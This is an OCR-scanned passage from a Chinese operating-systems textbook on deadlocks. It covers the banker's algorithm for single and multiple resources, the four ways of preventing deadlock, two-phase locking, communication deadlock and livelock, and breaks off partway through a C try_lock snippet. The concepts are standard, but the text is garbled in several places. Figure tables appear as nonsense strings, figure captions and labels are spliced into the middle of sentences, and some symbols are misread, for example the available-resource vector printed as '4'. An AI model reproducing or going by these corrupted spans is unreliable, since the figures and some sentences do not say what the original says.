的 分 配方 案 ， 从 安全 状态 进入 到 了 不 安全 状态 。 从 图 6-10c 的 状态 出 发 运行 进程 A 或 C 也 都 不 行 。 回 过 头 
来 再 看 ，A 的 请 求 不 应 该 满足 。 

值得 注意 的 是 ， 不 安全 状态 并 不 是 死 锁 。 从 图 6-10b 出 发 ， 系 统 能 运行 一 段 时 间 。 实 际 上 ， 甚 至 有 
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一 个 进程 能 够 完成 。 而 且 ， 在 A 请 求 其 他 资源 实例 前 ，A 可 能 先 释放 一 个 资源 实例 ， 这 就 可 以 让 C 先 完成 ， 
从 而 避免 了 死 锁 。 因 而 ， 安 全 状态 和 不 安全 状态 的 区 别 是 : 从 安全 状态 出 发 ， 系 统 能 够 保证 所 有 进程 都 
能 完成 ， 而 从 不 安全 状态 出 发 ， 就 没有 这 样 的 保证 。 


已 有 最 大 已 有 最 大 已 有 最 大 已 有 最 大 
数量 需求 数量 需求 数量 需求 数量 需求 
[as] 9| [afa] e] | A | afa]. 
[日 | 14 [日 | | 4 [日 |414| [=|=] 
[ele]? ] [ele]? [ele]? ] 
Z: 3 空闲 : 2 空闲 : 0 空闲 : 4 


图 6-10 说 明 b 中 的 状态 为 不 安全 状态 


6.5.3 单个 资源 的 银行 家 算法 

Dijkstra (1965) 提出 了 一 种 能 够 避免 死 锁 的 调度 算法 ， 称 为 银行 家 算法 (banker’s algorithm), ix 
是 6.4.1 节 中 给 出 的 死 锁 检测 算法 的 扩展 。 该 模型 基于 一 个 小 城镇 的 银行 家 ， 他 向 一 群 客户 分 别 承诺 了 一 
定 的 贷款 额度 。 算 法 要 做 的 是 判断 对 请 求 的 满足 是 否 会 导致 进入 不 安全 状态 。 如 果 是 ， 就 拒绝 请 求 ， 如 
果 满 足 请 求 后 系统 仍然 是 安全 的 ， 就 予以 分 配 。 在 图 6-11a 中 我 们 看 到 4 个 客户 A、B、C、D， 每 个 客户 
都 被 授予 一 定数 量 的 贷款 单位 (比如 1 单位 是 1 千 美元 ) ， 银 行家 知道 不 可 能 所 有 客户 同时 都 需要 最 大 贷 
款额 ， 所 以 他 只 保留 10 个 单位 而 不 是 22 个 单位 的 资金 来 为 客户 服务 。 这 里 将 客户 比 作 进程 ， 贷 款 单位 比 
作 资 源 ， 银 行家 比 作 操作 系统 。 





图 6-11 三 种 资源 分 配 状 态 : a) 安全 ，b) RAs c) 不 安全 


客户 们 各 自 做 自己 的 生意 ， 在 某 些 时 刻 需要 贷款 (相当 于 请 求 资源 ) 。 在 某 一 时 刻 ， 有 具体 情况 如 
图 6-11b 所 示 。 这 个 状态 是 安全 的 ， 由 于 保留 着 2 个 单位 ， 银 行家 能 够 拖延 除了 C 以 外 的 其 他 请 求 。 因 而 
可 以 让 C 先 完成 ， 然 后 释放 C 所 占 的 4 个 单位 资源 。 有 了 这 4 个 单位 资源 ， 银 行家 就 可 以 给 D 或 B 分 配 所 需 
的 贷款 单位 ， 以 此 类 推 。 

考虑 假如 向 B 提 供 了 另 一 个 他 所 请 求 的 贷款 单位 ， 如 图 6-11b 所 示 ， 那 么 我 们 就 有 如 图 6-11c 所 示 的 
状态 ,该 状态 是 不 安全 的 。 如 果 忽 然 所 有 的 客户 都 请 求 最 大 的 限额 ， 而 银行 家 无 法 满足 其 中 任何 一 个 的 
要 求 ， 那 么 就 会 产生 死 锁 。 不 安全 状态 并 不 一 定 引 起 死 锁 ， 由 于 客户 不 一 定 需要 其 最 大 贷款 额度 ;但 银 
行家 不 敢 抱 这 种 侥幸 心理 。 

银行 家 算法 就 是 对 每 一 个 请 求 进行 检查 ， 检 查 如 果 满 足 这 一 请 求 是 否 会 达到 安全 状态 。 若 是 ， 那 么 
就 满足 该 请 求 ， 否 则 ， 就 推迟 对 这 一 请 求 的 满足 。 为 了 检查 状态 是 否 安全 ， 银 行家 需要 考虑 他 是 否 有 足 
够 的 资源 满足 某 一 个 客户 。 如 果 可 以 ， 那 么 这 笔 贷款 就 是 能 够 收回 的 ， 并 且 接 着 检查 最 接近 最 大 限额 的 
一 个 客户 ， 以 此 类 推 。 如 果 所 有 投资 最 终 都 能 被 收回 ， 那 么 该 状态 是 安全 的 ， 最 初 的 请 求 可 以 批准 。 


6.5.4 多 个 资源 的 银行 家 算法 
可 以 把 银行 家 算法 进行 推广 以 处 理 多 个 资源 。 图 6-12 说 明了 多 个 资源 的 银行 家 算法 如 何 工作 。 
在 图 6-12 中 我 们 看 到 两 个 矩阵 。 左 边 的 矩阵 显示 出 为 5 个 进程 分 别 已 分 配 的 各 种 资源 数 ， 右 边 的 矩 


258 POF 


阵 显示 了 使 各 进程 完成 运行 所 需 的 各 种 资源 数 。 这 些 矩 阵 就 是 图 6-6 中 的 C 和 R。 和 一 个 资源 的 情况 一 样 ， 
各 进程 在 执行 前 给 出 其 所 需 的 全 部 资源 量 ， 所 以 
在 系统 的 每 一 步 中 都 可 以 计算 出 右边 的 矩阵 。 

图 6-12 最 右边 的 三 个 向 量 分 别 表示 现 有 资 
源 E、 已 分 配 资源 P 和 可 用 资源 4。 由 E 可 知 系 
统 中 共有 6 台 磁 带 机 、3 台 绘图 仪 、4 台 打印 机 
和 2 台 蓝 光 光驱 。 由 P 可 知 当前 已 分 配 了 5 台 磁 
带 机 、3 台 绘图 仪 、2 台 打印 机 和 2 台 蓝 光 光 驱 。 
该 向 量 可 通过 将 左边 矩阵 的 各 列 相 加 获得 ， 可 
用 资源 向 量 可 通过 从 现 有 资源 中 减 去 已 分 配 资 已 分 配 资源 仍然 需要 的 资源 
源 获得 。 图 6-12 多 个 资源 的 银行 家 算法 

检查 一 个 状态 是 否 安全 的 算法 如 下 : 

1) 查找 右边 矩阵 中 是 否 有 一 行 ， 其 没有 被 满足 的 资源 数 均 小 于 或 等 于 4。 如 果 不 存在 这 样 的 行 ， 那 
么 系统 将 会 死 锁 ， 因 为 任何 进程 都 无 法 运行 结束 (假定 进程 会 一 直 占 有 资源 直到 它们 终止 为 止 ) 。 

2) 假若 找到 这 样 一 行 ， 那 么 可 以 假设 它 获得 所 需 的 资源 并 运行 结束 ， 将 该 进程 标记 为 终止 ， 并 将 其 
资源 加 到 向 量 4 上 。 

3) 重复 以 上 两 步 ， 或 者 直到 所 有 的 进程 都 标记 为 终止 ， 其 初始 状态 是 安全 的 ; 或 者 所 有 进程 的 资源 
需求 都 得 不 到 满足 ， 此 时 就 是 发 生 了 死 锁 。 

如 果 在 第 1 步 中 同时 有 若干 进程 均 符合 条 件 ， 那 么 不 管 挑选 哪 一 个 运行 都 没有 关系 ， 因 为 可 用 资源 
或 者 会 增多 ， 或 者 至 少 保持 不 变 。 

图 6-12 中 所 示 的 状态 是 安全 的 ， 若 进程 B 现 在 再 请 求 一 台 打 印 机 ， 可 以 满足 它 的 请 求 ， 因 为 所 得 系 
统 状 态 仍 然 是 安全 的 (进程 D 可 以 结束 ， 然 后 是 A 或 E 结 束 ， 剩 下 的 进程 相继 结束 )。 

假设 进程 B 获 得 两 台 可 用 打印 机 中 的 一 台 以 后 ，E 试 图 获得 最 后 一 台 打印 机 ， 假 若 分 配给 E， 可 用 资 
源 向 量 会 减 到 (1 0 0 0) ， 这 时 会 引起 死 锁 。 显 然 E 的 请 求 不 能 立即 满足 ， 必 须 延迟 一 段 时 间 。 

银行 家 算法 最 早 由 Dijkstra 于 1965 年 发 表 。 从 那 之 后 几乎 每 本 操作 系统 的 专著 都 详细 地 描述 它 ， 很 
多 论文 的 内 容 也 围绕 该 算法 讨论 了 它 的 不 同方 面 。 但 很 少 有 作者 指出 该 算法 虽然 很 有 意义 但 缺乏 实用 价 
值 ， 因 为 很 少 有 进程 能 够 在 运行 前 就 知道 其 所 需 资源 的 最 大 值 。 而 且 进程 数 也 不 是 固定 的 ， 往 往 在 不 断 
地 变化 〈 如 新 用 户 的 登录 或 退出 ) ， 况 且 原 本 可 用 的 资源 也 可 能 突然 间 变 成 不 可 用 (如 磁带 机 可 能 会 坏 
掉 ) 。 因 此 ， 在 实际 中 ， 如 果 有 ， 也 只 有 极 少 的 系统 使 用 银行 家 算法 来 避免 死 锁 。 然 而 ， 一 些 系统 可 以 
使 用 诸如 银行 家 算法 之 类 的 启发 式 方法 来 避免 死 锁 。 例 如 ， 当 缓冲 区 利用 率 达到 70% 以 上 时 ， 网 络 会 实 
现 自动 节 流 ， 此 时 网 络 预计 剩余 的 30% 就 足够 使 用 户 完成 服务 并 返回 资源 。 


6.6 死 锁 预防 

通过 前 面 的 学 习 我 们 知道 ， 死 锁 避 免 从 本 质 上 来 说 是 不 可 能 的 ， 因 为 它 需 要 获知 未 来 的 请 求 ， 而 这 
些 请 求 是 不 可 知 的 。 那 么 实际 的 系统 又 是 如 何 避 免 死 锁 的 呢 ? 我 们 回顾 Cofftman 等 人 (1971) 所 述 的 四 
个 条 件 ， 看 是 否 能 发 现 线索 。 如 果 能 够 保证 四 个 条 件 中 至 少 有 一 个 不 成 立 ， 那 么 死 锁 将 不 会 产生 
(Havender，1968 ) 。 


6.6.1 破坏 互 斥 条 件 

先 考虑 破坏 互 斥 使 用 条 件 。 如 果 资 源 不 被 一 个 进程 所 独占 ， 那 么 死 锁 肯定 不 会 产生 。 当 然 ， 允 许 两 
个 进程 同时 使 用 打印 机 会 造成 混乱 ， 通 过 采用 假 脱 机 打印 机 (spooling printer) 技术 可 以 允许 若干 个 进 
程 同 时 产生 输出 。 该 模型 中 唯一 真正 请 求 使 用 物理 打印 机 的 进程 是 打印 机 守护 进程 ， 由 于 守护 进程 决 不 
会 请 求 别 的 资源 ， 所 以 不 会 因 打印 机 而 产生 死 锁 。 

假设 守护 进程 被 设计 为 在 所 有 输出 进入 假 脱 机 之 前 就 开始 打印 ， 那 么 如 果 一 个 输出 进程 在 头 一 轮 打印 
之 后 决定 等 待 几 个 小 时 ， 打 印 机 就 可 能 空置 。 为 了 避免 这 种 现象 ， 一 般 将 守护 进程 设计 成 在 完整 的 输出 文 
件 就 绪 后 才 开 始 打 印 。 例 如 ， 若 两 个 进程 分 别 占用 了 可 用 的 假 脱 机 磁盘 空间 的 一 半 用 于 输出 ， 而 任何 一 个 
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也 没有 能 够 完成 输出 ， 那 么 会 怎样 ? 在 这 种 情形 下 ， 就 会 有 两 个 进程 ， 其 中 每 一 个 都 完成 了 部 分 的 输出 ， 
但 不 是 它们 的 全 部 输出 ， 于 是 无 法 继续 进行 下 去 。 没 有 一 个 进程 能 够 完成 ， 结 果 在 磁盘 上 出 现 了 死 锁 。 

不 过 ， 有 一 个 小 思路 是 经 常 可 适用 的 。 那 就 是 ， 避 免 分 配 那些 不 是 绝对 必需 的 资源 ， 尽 量 做 到 尽 可 
能 少 的 进程 可 以 真正 请 求 资源 。 

6.6.2 破坏 占有 并 等 待 条 件 

Coffman 等 表述 的 第 二 个 条 件 似 乎 更 有 希望 。 只 要 禁止 已 持 有 资源 的 进程 再 等 待 其 他 资源 便 可 以 消 
除 死 锁 。 一 种 实现 方法 是 规定 所 有 进程 在 开始 执行 前 请 求 所 需 的 全 部 资源 。 如 果 所 需 的 全 部 资源 可 用 ， 
那么 就 将 它们 分 配给 这 个 进程 ， 于 是 该 进程 肯定 能 够 运行 结束 。 如 果 有 一 个 或 多 个 资源 正 被 使 用 ， 那 么 
就 不 进行 分 配 ， 进 程 等 待 。 

这 种 方法 的 一 个 直接 问题 是 很 多 进程 直到 运行 时 才 知 道 它 需要 多 少 资源 。 实 际 上 ， 如 果 进 程 能 够 知 
道 它 需 要 多 少 资源 ， 就 可 以 使 用 银行 家 算法 。 另 一 个 问题 是 这 种 方法 的 资源 利用 率 不 是 最 优 的 。 例 如 ， 
有 一 个 进程 先 从 输入 磁带 上 读 取 数据 ， 进 行 一 小 时 的 分 析 ， 最 后 会 写 到 输出 磁带 上 ， 同 时 会 在 绘图 仪 上 
给 出。 如 果 所 有 资源 都 必须 提前 请 求 ， 这 个 进程 就 会 把 输出 磁带 机 和 绘图 仪 控制 住 一 小 时 。 

不 过 ， 一 些 大 型 机 批 处 理 系统 要 求 用 户 在 所 提交 的 作业 的 第 一 行列 出 它们 需要 多 少 资源 。 然 后 ， 系 
统 立 即 分 配 所 需 的 全 部 资源 ， 并 且 直 到 作业 完成 才 回收 资源 。 虽 然 这 加 重 了 编程 人 员 的 负担 ， 也 造成 了 
资源 的 浪费 ， 但 这 的 确 防止 了 死 锁 。 

另 一 种 破坏 占有 并 等 待 条 件 的 略 有 不 同 的 方案 是 ， 要 求 当 一 个 进程 请 求 资源 时 ， 先 暂时 释放 其 当前 
占用 的 所 有 资源 ， 然 后 再 尝试 一 次 获得 所 需 的 全 部 资源 。 


6.6.3 破坏 不 可 抢占 条 件 

破坏 第 三 个 条 件 (不 可 抢占 ) 也 是 可 能 的 。 假 若 一 个 进程 已 分 配 到 一 台 打印 机 ， 且 正在 进行 打印 和 输 
出 ， 如 果 由 于 它 需要 的 绘图 仪 无 法 获得 而 强制 性 地 把 它 占有 的 打印 机 抢占 掉 ， 会 引起 一 片 混乱 。 但 是 ， 
一 些 资源 可 以 通过 虚拟 化 的 方式 来 避免 发 生 这 样 的 情况 。 假 脱 机 打印 机 向 磁盘 输出 ， 并 且 只 允许 打印 机 
守护 进程 访问 真正 的 物理 打印 机 ， 这 种 方式 可 以 消除 涉及 打印 机 的 死 锁 ， 然 而 却 可 能 带 来 由 磁盘 空间 导 
致 的 死 锁 。 但 是 对 于 大 容量 磁盘 ， 要 消耗 完 所 有 的 磁盘 空间 一 般 是 不 可 能 的 。 

然而 ， 并 不 是 所 有 的 资源 都 可 以 进行 类 似 的 虚拟 化 。 例 如 ， 数 据 库 中 的 记录 或 者 操作 系统 中 的 表 都 
必须 被 锁定 ， 因 此 存在 出 现 死 锁 的 可 能 。 


6.6.4 破坏 环 路 等 待 条 件 
现在 只 剩 下 一 个 条 件 了 。 消除 环 路 等 待 有 几 种 方法 。 一 种 是 保证 每 一 个 进程 在 任何 时 刻 只 能 占用 一 
个 资源 , 如 果 要 请 求 另外 一 个 资源 , 它 必须 先 释放 第 一 个 资源 。 





但 假若 进程 正在 把 一 个 读 入 并 i a A g 

一 个 大 文件 从 磁带 机 上 读 入 并 送 到 打印 机 打 | 2 打印 机 

印 ， 那 么 这 种 限制 是 不 可 接受 的 。 j pla i i 
另 一 种 避免 出 现 环 路 等 待 的 方法 是 将 所 有 资源 统一 编号 ， | 5 蓝光 光驱 ey E 

如 图 6-13a 所 示 。 现 在 的 规则 是 : 进程 可 以 在 任何 时 刻 提出 次 i 


源 请 求 , 但 是 所 有 请 求 必须 按照 资源 编号 的 顺序 (升序 ) 提出 。 
进程 可 以 先 请 求 打印 机 后 请 求 磁带 机 ， 但 不 可 以 先 请 求 绘图 仪 。 图 6 13 D 对 资源 排序 编号 ，b) 一 个 次 
后 请 求 打印 机 。 源 分 配 图 

车 按 此 规则 ， 资 源 分 配 图 中 肯定 不 会 出 现 环 。 让 我 们 看 看 在 有 两 个 进程 的 情形 下 为 何 可 行 ， 参 看 
图 6-13b。 只 有 在 A 请 求 资源 j 且 B 请 求 资源 ;的 情况 下 会 产生 死 锁 。 假 设 i 和 j 是 不 同 的 资源 ， 它 们 会 具有 不 
同 的 编号 。 若 i>j， 那么 A 不 允许 请 求 j， 因 为 这 个 编号 小 于 A 已 有 资源 的 编号 ， 若 i<j， 那么 B 不 允许 请 求 i， 
因为 这 个 编号 小 于 B 已 有 资源 的 编号 。 不 论 哪 种 情况 都 不 可 能 产生 死 锁 。 

对 于 多 于 两 个 进程 的 情况 ， 同 样 的 逻辑 依然 成 立 。 在 任何 时 候 ， 总 有 一个 已 分 配 的 资源 是 编号 最 高 
的 。 占 用 该 资源 的 进程 不 可 能 请 求 其 他 已 分 配 的 各 种 资源 。 它 或 者 会 执行 完毕 ， 或 者 最 坏 的 情形 是 去 请 
求 编号 更 高 的 资源 ， 而 编号 更 高 的 资源 肯定 是 可 用 的 。 最 终 ， 它 会 结束 并 释放 所 有 资源 ， 这 时 其 他 占有 
最 高 编号 资源 的 进程 也 可 以 执行 完 。 简 言 之 ， 存 在 一 种 所 有 进程 都 可 以 执行 完毕 的 情景 ， 所 以 不 会 产生 
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死 锁 。 
该 算法 的 一 个 变种 是 取消 必须 按 升序 请 求 资源 的 限制 ， 而 仅仅 要 求 不 允许 进程 请 求 比 当前 所 占有 资 
源 编号 低 的 资源 。 所 以 ， 若 一 个 进程 起 初 请 求 9 号 




















和 10 号 资源 ， 而 随后 释放 两 者 ， 那 么 它 实 际 上 相 L = LLES 

当 于 从 头 开始 ， 所 以 没有 必要 阻止 它 现在 请 求 1 号 | F — ERE 

资源 。 占有 和 等 待 在 开始 就 请 求全 部 资源 
尽管 对 资源 编号 的 方法 消除 了 死 锁 的 问题 ， E 抢占 资源 

但 几乎 找 不 出 一 种 使 每 个 人 都 满意 的 编号 次 序 。 MEN HERBAS 

当 资源 包括 进程 表 项 、 假 脱 机 磁盘 空间 、 加 锁 的 图 6-14 死 锁 预 防 方法 汇总 


数据 库 记 录 及 其 他 抽象 资源 时 ， 潜 在 的 资源 及 各 
种 不 同 用 途 的 数目 会 变 得 很 大 ， 以 至 于 使 编号 方法 根本 无 法 使 用 。 
死 锁 预防 的 各 种 方法 如 图 6-14 所 示 。 


6.7 其 他 问题 
在 本 节 中 ， 我 们 会 讨论 一 些 和 死 锁 相关 的 问题 ， 包 括 两 阶段 加 锁 、 通 信 死 锁 、 活 锁 和 饥饿 。 


6.7.1 两 阶段 加 锁 

虽然 在 一 般 情 况 下 避免 死 锁 和 预防 死 锁 并 不 是 很 有 希望 ， 但 是 在 一 些 特殊 的 应 用 方面 ， 有 很 多 卓越 
的 专用 算法 。 例 如 ， 在 很 多 数据 库 系统 中 ， 一 个 经 常 发 生 的 操作 是 请 求 锁 住 一 些 记 录 ， 然 后 更 新 所 有 锁 
住 的 记录 。 当 同时 有 多 个 进程 运行 时 ， 就 有 出 现 死 锁 的 危险 。 

常用 的 方法 是 两 阶段 加 锁 (two-phase locking)。 在 第 一 阶段 ,进程 试图 对 所 有 所 需 的 记录 进行 加 锁 ， 
一 次 锁 一 个 记录 。 如 果 第 一 阶段 加 锁 成 功 ， 就 开始 第 二 阶段 ， 完 成 更 新 然后 释放 锁 。 在 第 一 阶段 并 没有 
做 实际 的 工作 。 

如 果 在 第 一 阶段 某 个 进程 需要 的 记录 已 经 被 加 锁 ， 那 么 该 进程 释放 它 所 有 加 锁 的 记录 ， 然 后 重新 开 
始 第 一 阶段 。 从 某 种 意义 上 说 ， 这 种 方法 类 似 于 提前 或 者 至 少 是 未 实施 一 些 不 可 逆 的 操作 之 前 请 求 所 有 
资源 。 在 两 阶段 加 锁 的 一 些 版 本 中 ， 如 果 在 第 一 阶段 遇 到 了 已 加 锁 的 记录 ， 并 不 会 释放 锁 然 后 重新 开始 ， 
这 就 可 能 产生 死 锁 。 

不 过 ， 在 一 般 意义 下 ， 这 种 策略 并 不 通用 。 例 如 ， 在 实时 系统 和 进程 控制 系统 中 ， 由 于 一 个 进程 缺 ， 
少 一 个 可 用 资源 就 半途 中 断 它 ， 并 重新 开始 该 进程 ， 这 是 不 可 接受 的 。 如 果 一 个 进程 已 经 在 网 络 上 读 写 
消息 、 更 新 文件 或 从 事 任 何不 能 安全 地 重复 做 的 事 ， 那 么 重新 运行 进程 也 是 不 可 接受 的 。 只 有 当 程 序 员 
仔细 地 安排 了 程序 ， 使 得 在 第 一 阶段 程序 可 以 在 任意 一 点 停 下 来 ， 并 重新 开始 而 不 会 产生 错误 ， 这 时 这 
个 算法 才 可 行 。 但 很 多 应 用 并 不 能 按 这 种 方式 来 设计 。 


6.7.2 通信 死 锁 

到 目前 为 止 ， 我 们 的 工作 都 集中 在 资源 死 锁 上 。 若 一 个 进程 请 求 某 个 其 他 进程 持 有 的 资源 ， 就 必须 
等 待 直到 其 使 用 者 释放 资源 。 这 些 资 源 有 时 是 硬件 或 软件 对 象 ， 例 如 蓝光 光驱 或 者 数据 库 的 记录 ， 有 时 
则 是 更 抽象 的 。 资 源 死 锁 是 竞争 性 同步 的 问题 。 进 程 在 执行 过 程 中 如 果 与 竞争 的 进程 无 交叉 ， 便 会 顺利 
执行 。 进 程 将 资源 加 锁 ， 是 为 了 防止 交替 访问 资源 而 产生 不 一 致 的 资源 状态 。 交 替 访 问 加 锁 的 资源 将 有 
可 能 产生 死 锁 。 在 图 6-2 中 我 们 看 到 了 信和 号 量 作为 资源 而 产生 的 死 锁 。 信 号 量 是 比 蓝光 光驱 更 抽象 的 一 
种 资源 ， 但 是 在 这 个 例子 中 ， 每 个 进程 都 成 功 获得 了 一 个 资源 (一 个 信号 量 ) ， 并 在 请 求 另 一 个 资源 
( 另 一 个 信号 量 ) 时 产生 死 锁 。 这 是 一 种 典型 的 资源 死 锁 。 

然而 ， 正 如 我 们 在 本 章 开 始 提 到 的 ， 资 源 死 锁 是 最 普遍 的 一 种 类 型 ， 但 不 是 唯一 的 一 种 。 另 一 种 死 
锁 发 生 在 通信 系统 中 (比如 说 网 络 )， 即 两 个 或 两 个 以 上 进程 利用 发 送信 息 来 通信 时 。 一 种 普遍 的 情形 
是 进程 A 向 进程 B 发 送 请 求 信 息 ， 然 后 阻塞 直至 B 回 复 。 假 设 请 求 信息 丢失 ，A 将 阻塞 以 等 待 回复 ， 而 B 
会 阻塞 等 待 一 个 向 其 发 送 命令 的 请 求 ， 因 此 发 生死 锁 。 

尽管 如 此 ， 但 这 并 不 是 一 个 经 典 的 资源 死 锁 。A 没 有 占有 B 所 需 的 资源 ， 反 之 亦 然 。 事 实 上 ， 并 没 
有 完全 可 见 的 资源 。 但 是 ， 根 据 标 准 的 定义 ， 在 一 系列 进程 中 ， 每 个 进程 因为 等 待 另 外 一 个 进程 引发 的 
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事件 而 产生 阻塞 ， 这 就 是 一 种 死 锁 。 相 比 于 更 加 常见 的 资源 死 锁 ， 我 们 把 上 面 这 种 情况 叫 作 通信 死 锁 
(communication deadlock)。 通 信 死 锁 是 协同 同步 的 异常 情况 ， 处 于 这 种 死 锁 中 的 进程 如 果 是 各 自 独 立 
执行 的 ， 则 无 法 完成 服务 。 

通信 死 锁 不 能 通过 对 资源 排序 (因为 没有 ) 或 者 通过 仔细 地 安排 调度 来 避免 (因为 任何 时 刻 的 请 求 
都 是 不 允许 被 延迟 的 )。 幸 运 的 是 ， 另 外 一 种 技术 通常 可 以 用 来 中 断 通信 死 锁 : 超时 。 在 大 多 数 网 络 通 
信 系 统 中 ， 只 要 一 个 信息 被 发 送 至 一 个 特定 的 地 方 ， 并 等 待 其 返回 一 个 预期 的 回复 ， 发 送 者 就 同时 启动 
计时 器 。 若 计时 器 在 回复 到 达 前 计时 就 停止 了 ， 则 信息 的 发 送 者 可 以 认定 信息 已 经 丢失 ， 并 重新 发 送 
(如 果 需 要 ， 则 一 直 重 复 ) 。 通 过 这 种 方式 ， 可 以 避免 死 锁 。 换 种 说 法 就 是 ， 超 时 策略 作为 一 种 启发 式 方 
法 可 探测 死 锁 并 使 进程 恢复 正常 。 这 种 方式 也 适用 于 资源 死 锁 。 另 外 ， 有 些 用 户 使 用 的 设备 驱动 程序 是 
多 变 的 或 者 有 漏洞 的 ， 会 导致 死 锁 或 系统 冻结 ， 这 些 用 户 也 要 依赖 于 超时 策略 。 

当然 ， 如 果 原 始 信息 没有 丢失 ， 而 仅仅 是 回复 延 时 ， 接 收 者 可 能 收 到 两 次 或 者 更 多 次 信息 ， 甚 至 导 
致意 想不到 的 结果 。 想 象 电子 银行 系统 中 包含 付款 说 明 的 信息 。 很 明显 ， 不 应 该 仅仅 因为 网 速 缓 慢 或 者 
超时 设 定 太 短 ， 就 重复 (并 执行 ) 多 次 。 应 该 将 通信 规则 通常 称 为 协议 (protocol) 一 一 设计 为 让 
所 有 事情 都 正确 ， 这 是 一 个 复杂 的 课题 ， 超 出 了 本 书 的 范围 。 对 网 络 协议 感 兴趣 的 读者 可 以 参考 我 的 另 
外 一 本 书 一 一 《Computer Networks} (Tanenbaum 和 Wetherall，2010 ) 。 

并 非 所 有 在 通信 系统 或 者 网 络 发 生 的 死 锁 都 是 通信 死 锁 。 资 源 死 锁 也 会 发 生 ， 如 图 6-15 中 的 网 络 。 
这 张 图 是 因特网 的 简化 图 (极其 简化 ) 。 因 特 网 由 两 类 计算 机 组 成 : 主机 和 路 由 器 。 主 机 (host) 是 一 台 
用 户 计算 机 ， 可 以 是 某 人 家 里 的 PC、 公 司 的 个 人 计算 机 ， 也 可 能 是 一 个 共享 服务 器 。 主 机 由 人 来 操作 。 
路 由 器 (router) 是 专用 的 通信 计算 机 ， 将 数据 包 从 源 发 送 至 目的 地 。 每 台 主 机 都 连接 一 个 或 更 多 的 路 
由 器 ， 可 以 用 一 条 DSL 线 、 有 线 电视 连接 、 局 域 网 、 拨 号 线路 、 无 线 网 络 、 光 纤 等 来 连接 。 

当 一 个 数据 包 从 一 个 主机 进入 路 由 器 时 ， 它 被 放 入 一 个 缓冲 区 中 ， 然 后 传输 到 另外 一 个 路 由 器 ， 再 
到 另 一 个 ， 直 至 目的 地 。 这 些 缓冲 区 都 是 资源 并 且 数 目 有 限 。 在 图 6-15 中 ， 每 个 路 由 器 都 有 8 个 缓冲 器 


(实际 应 用 中 有 数 以 百 万 计 ， 但 是 并 不 能 改变 淤 
缓冲 区 路 由 器 
dona nooo 
aona nomo 





在 死 锁 的 本 质 ， 只 是 改变 了 它 的 频率 )。 假 设 路 
由 器 A 的 所 有 数据 包 需 要 发 送 到 B，B 的 所 有 数 
据 包 需 要 发 送 到 C，C 的 所 有 数据 包 需 要 发 送 到 
D， 然 后 D 的 所 有 数据 包 需 要 发 送 到 A。 那 么 设 
有 数据 包 可 以 移动 ， 因 为 在 另 一 端 没有 缓冲 区 。 
这 就 是 一 个 典型 的 资源 死 锁 ， 尽 管 它 发 生 在 通 
信 系统 中 。 


6.7.3 活 锁 
在 某 些 情 况 下 ， 当 进程 意识 到 它 不 能 获取 图 6-15 一 个 网 络 中 的 资源 死 锁 
所 需要 的 下 一 个 锁 时 ， 就 会 尝试 礼貌 地 释放 已 经 
获得 的 锁 ， 然 后 等 待 lIms， 再 尝试 一 次 。 从 理论 上 来 说 ， 这 是 用 来 检测 并 预防 死 锁 的 好 方法 。 但 是 ， 如 
果 另 一 个 进程 在 相同 的 时 刻 做 了 相同 的 操作 ， 那 么 就 像 两 个 人 在 一 条 路 上 相遇 并 同时 给 对 方 让 路 一 样 ， 
相同 的 步调 将 导致 双方 都 无 法 前 进 。 
设想 try_lock 原 语 ， 调 用 进程 可 以 检测 互 斥 量 ， 要 么 获取 它 ， 要 么 返回 失败 。 换 句 话说 ， 就 是 它 不 
会 阻塞 。 程 序 员 可 以 将 其 与 acquire_lock 并 用 ， 后 者 也 试图 获得 锁 ， 但 是 如 果 不 能 获得 就 会 产生 阻塞 。 
现在 设想 有 一 对 并 行 运行 的 进程 (可 能 在 不 同 的 CPU 核 上 ) 用 到 了 两 个 资源 ， 如 图 6-16 示 。 每 一 个 进程 
都 需要 两 个 资源 ， 并 使 用 try_lock 原 语 试图 获取 锁 。 如 果 获 取 失 败 ， 那 么 进程 便 会 放弃 它 所 持 有 的 锁 并 
再 次 尝试 。 在 图 6-16 中 ， 进 程 A 运 行 时 获得 了 资源 1， 进 程 2 运行 时 获得 了 资源 2。 接 下 来 ， 它 们 分 别 试图 
获取 另 一 个 锁 并 都 失败 了 。 于 是 它们 便 会 释放 当前 持 有 的 锁 ， 然 后 再 试 一 次 。 这 个 过 程 会 一 直 重 复 ， 直 
到 有 个 无 聊 的 用 户 (或 者 其 他 实体 ) 前 来 解救 其 中 的 某 个 进程 。 很 明显 ， 这 个 过 程 中 没有 进程 阻塞 ， 其 
至 可 以 说 进程 正在 活动 ， 所 以 这 不 是 死 锁 。 然 而 ， 进 程 并 不 会 继续 往 下 执行 ， 可 以 称 之 为 活 锁 
(livelock ) 。 
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活 锁 和 死 锁 也 经 常 出 人 意料 地 产生 。 在 一 些 系统 中 ， 


进程 数量 ， 因 此 进程 表 属 于 有 限 的 资源 。 如 果 由 于 进 
程 表 满 了 而 导致 一 次 fork 运 行 失败 ， 那 么 一 个 合理 的 
方法 是 : 该 程序 等 待 一 段 随机 长 的 时 间 ， 然 后 再 次 党 
试 运行 fork。 

现在 假设 一 个 UNIX 系 统 有 100 个 进程 槽 ，10 个 程 
序 正在 运行 ， 每 个 程序 需要 创建 12 个 (F) 进程 。 在 每 
个 进程 创建 了 9 个 进程 后 ，10 个 源 进程 和 90 个 新 的 进程 
就 已 经 占 满 了 进程 表 。10 个 源 进程 此 时 便 进入 了 死 锁 
不 停 地 进行 分 支 循环 和 运行 失败 。 发 生 这 种 情况 
的 可 能 性 是 极 小 的 ， 但是， 这 是 可 能 发 生 的 ! 我 们 是 
否 应 该 放弃 进程 以 及 fork 调 用 来 消除 这 个 问题 呢 ? 

限制 打开 文件 的 最 大 数量 与 限制 索引 节点 表 的 大 
小 的 方式 很 相像 ， 因 此 ， 当 它 被 完全 占用 的 时 候 ， 也 
会 出 现 相似 的 问题 。 硬 盘 上 的 交换 空间 是 另 一 个 有 限 
的 资源 。 事 实 上 ， 几 乎 操作 系统 中 的 每 种 表 都 代表 了 
一 种 有 限 的 资源 。 如 果 有 个 进程 ， 每 个 进程 都 申请 了 
1/n 的 资源 ， 然 后 每 一 个 又 试图 申请 更 多 的 资源 ， 这 种 
情况 下 我 们 是 不 是 应 该 禁 掉 所 有 的 呢 ? 也 许 这 不 是 一 
个 好 主意 。 

大 多 数 的 操作 系统 (包括 UNIX 和 Windows) 都 忽 
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进程 表 中 容纳 的 进程 数 决定 了 系统 允许 的 最 大 


void process_A(void) { 
acquire_lock(&resource_ 1); 
while (try_lock(&resource_2) == FAIL) { 
release_lock(&resource_ 1); 
wait_fixed_time(); 
